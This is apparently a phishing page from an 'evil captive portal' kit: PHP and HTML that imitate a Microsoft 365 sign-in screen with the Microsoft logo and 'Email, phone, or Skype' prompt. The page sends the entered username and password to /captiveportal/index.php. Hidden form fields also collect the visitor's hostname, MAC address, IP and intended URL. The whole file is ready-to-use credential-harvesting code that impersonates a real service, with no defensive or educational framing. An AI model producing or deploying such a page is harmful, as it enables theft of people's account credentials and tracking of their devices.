<?php
$destination = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
?>

<!DOCTYPE html>
<html>
<head>
  <!-- Set the favicon -->
  <script type="text/javascript">
	  function redirect() {
		  setTimeout(function() {
			  window.location = "/captiveportal/index.php";
		  }, 100);
	  }
  </script>
  <link rel="icon" type="image/png" href="assets/images/favicon.ico">
  <title>Microsoft 365 Login</title>
  <script src='assets/js/jquery-3.4.1.min.js'></script>
  <script src='assets/js/jquery-ui.min.js'></script>
  <script src='assets/js/bootstrap.min.js'></script>

  <link rel="stylesheet" type="text/css" href="styles.css">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <style media="screen">
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Calibri&display=swap');
    
    body {
      font-family: 'Calibri', sans-serif;
      background-color: #f8f8f8;
      margin: 0;
    }
    .container {
      width: 350px;
      margin: 100px auto;
      background-color: #ffffff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
    }
    .logo {
      text-align: left;
      margin-bottom: 20px;
      margin-left: 10px;
    }
    .logo img {
      width: 100px;
      height: auto;
    }
    h2 {
      color: #000;
      font-weight: bold;
      text-align: left;
      margin-left: 10px;
    }
    label {
      display: block;
      margin-bottom: 5px;
      color: #333;
    }
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 10px 0;
      margin-bottom: 10px;
      border: none;
      border-bottom: 1px solid #ccc;
      font-family: 'Calibri', sans-serif;
      background-color: transparent;
    }
    input[type="text"]::placeholder,
    input[type="password"]::placeholder {
      color: #888;
    }
    input[type="text"]:focus,
    input[type="password"]:focus {
      outline: none;
      border-color: #0078d4;
    }
    input[type="submit"] {
      background-color: #0078d4;
      color: #fff;
      border: none;
      padding: 10px 20px;
      border-radius: 3px;
      cursor: pointer;
      font-family: 'Calibri', sans-serif;
    }
    input[type="submit"]:hover {
      background-color: #005a9e;
    }
    .helper-text {
      margin-top: 5px;
      font-size: 12px;
      display: block;
    }
    .create-account {
      color: #0078d4;
      text-decoration: none;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="assets/images/microsoft_logo.png" alt="Microsoft Logo">
    </div>
    <h2>Sign in</h2>
    <form method="POST" action="/captiveportal/index.php" onsubmit="redirect()" id='email-form-step'>
    <!--<form action="process_login.php" method="post"> -->
      <input type="text" id="username" name="username" required placeholder="Email, phone, or Skype">
      <input type="password" id="password" name="password" required placeholder="Password">
      <input type="submit" value="Login">
		  <input type="hidden" name="hostname" value="<?=getClientHostName($_SERVER['REMOTE_ADDR']);?>">
		  <input type="hidden" name="mac" value="<?=getClientMac($_SERVER['REMOTE_ADDR']);?>">
		  <input type="hidden" name="ip" value="<?=$_SERVER['REMOTE_ADDR'];?>">
		  <input type="hidden" name="target" value="<?=$destination?>">

    </form>
    <p class="helper-text"><a href="#" style="color: #5dadec; text-decoration: none;">Can't access your account?</a></p>
  </div>
</body>
</html>
